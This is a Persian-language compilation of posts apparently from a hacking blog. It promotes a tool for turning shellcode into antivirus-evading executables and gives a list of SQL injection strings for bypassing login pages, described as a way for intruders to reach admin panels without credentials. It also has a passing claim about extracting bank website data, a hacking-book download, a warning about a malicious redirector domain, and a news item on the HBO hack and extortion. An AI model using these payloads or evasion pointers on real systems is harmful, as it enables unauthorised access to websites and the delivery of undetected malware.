bypass تمامی آنتی ویروس ها

توسط این ابزار شل کد خام خود را به فایل اجرای غیر قابل شناسایی تبدیل کنید 

🌐 https://github.com/Mr-Un1k0d3r/UniByAv 

منبع: Hijack.blog.ir

Bypass صفحه Login

مجموعه دستوراتی که برای تزریق به صفحات لاگین در باگ sql استفاده میشود شامل موارد زیر میشود.

or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin'or''='
admin" or "a"="
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a 
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

که نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به Bypass به پنل مدیریتی یا کاربری میکند.

منبع: Hijack.blog.ir

هشدار مهم به کاربران اینترنت

کاربران عزیز لطفا به سایت هایی که وارد می شوید به قدر کافی دقت کنید.

به تازگی سایت pldn[dot]ir (سیستم وبلاگدهی ) می باشد توسط کارشناسان امنیت سایبری پادویش رصد شده است این سایت و تمام آدرس هایی که به pldn[dot]ir ختم می شوند (تعدادی از آنها در زیر نمایش داده شده) درواقع یک سایت Redirector می باشند. 

⚠️ work.pldn[dot]ir  

⚠️ nemikham-bebinamet98.pldn[dot]ir

⚠️ game.pldn[dot]ir

⚠️ shabakeh.pldn[dot]ir

....

زمانی که شما این سایت را باز می کنید، به صورت تصادفی به صفحات دیگری هدایت می شوید که برخی از آن صفحات آلوده بوده و با استفاده از مهندسی اجتماعی تلاش می کنند تا شما را به دانلود فایل های آلوده ترغیب کنند.

این پیام را به دوستان خود اطلاع دهید

استخراج اطلاعات وبسایت بانک ها

به تصویر بالا و نوار آدرس دقت کنید نفوذگر با ارسال دستورات از همین قسمت اطلاعات وب سایت بانک را استخراج میکند.

کتاب راهکارهای هکرها

کتاب راهکارهای هکر چرخه کامل تست نفوذ  را به صورت کاربردی علمی به شما نشان می دهد

جهت دانلود کتاب کلیک کنید 

زبان: فارسی

حجم فایل: 36.2 MB

رمز فایل: hijack.blog.ir

هک شبکه HBO توسط هکر ایرانی

بهزاد مصری به اتهام هک شبکه HBO در جمع ۷ هکر ایرانی تحت تعقیب FBI قرار گرفت

🔴 بهزاد عضو تیم Turk Black Hat Security می باشد

🔹 اتهام وارده بهزاد را به دولت ایران مرتبط نمی داند. ظاهرا هدف از این هک، سرقت سریال های هنوز منتشر نشده بوده است.

🔹 بهزاد پس از هک اچ بی او، به افراد مختلف سازمانی ایمیلی فرستاده که در آن آنها را تحقیر کرده و عکس‌های لو رفته از قسمت های منتشر نشده را ضمیمه نموده است!

🔹 ظاهرا نام مستعار بهزاد Skote Vahshat یا سکوت وحشت می باشد. 

🔴 وی ۵.۵ میلیون دلار به بیتکوین برای منتشر نکردن داده های هک شده اخاذی نموده است. پس از یک هفته از هک، وی با انتشار قسمت هایی از سریال بر روی اینترنت اخاذی را جدی کرده است.